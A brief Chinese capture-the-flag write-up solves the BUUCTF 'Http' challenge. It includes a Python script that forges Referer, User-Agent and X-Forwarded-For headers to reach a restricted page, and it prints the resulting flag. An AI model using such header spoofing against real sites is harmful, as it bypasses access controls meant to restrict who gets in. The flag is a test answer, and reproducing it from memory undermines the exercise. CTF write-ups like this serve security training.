题目链接: https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]Http

题目

一个网站

思路

题目给了一个网站，在网页源码里可以找到一句
<a style=“border:none;cursor:default;” onclick=“return false” href=“Secret.php”>
可以猜到题目和 Secret.php 有关
打开后即可按照题目提示分别加上三个请求头:

Referer:https://Sycsecret.buuoj.cn
User-Agent:Syclover
X-Forwarded-For:127.0.0.1

    import httpx
    url = 'http://node4.buuoj.cn:27094/Secret.php'
    headers = {"Referer":"https://Sycsecret.buuoj.cn","User-Agent":"Syclover","X-Forwarded-For":"127.0.0.1"}
    r = httpx.get(url,headers=headers)
    print(r.text)

可得 flag 为 flag{10b601e9-9ce4-4abc-b69d-32123353d17e}

见了鬼了，用 Postman 死活不行…还得是 Python

最后修改于 2023-01-12

WP BUUCTF [极客大挑战2019]Http

题目

思路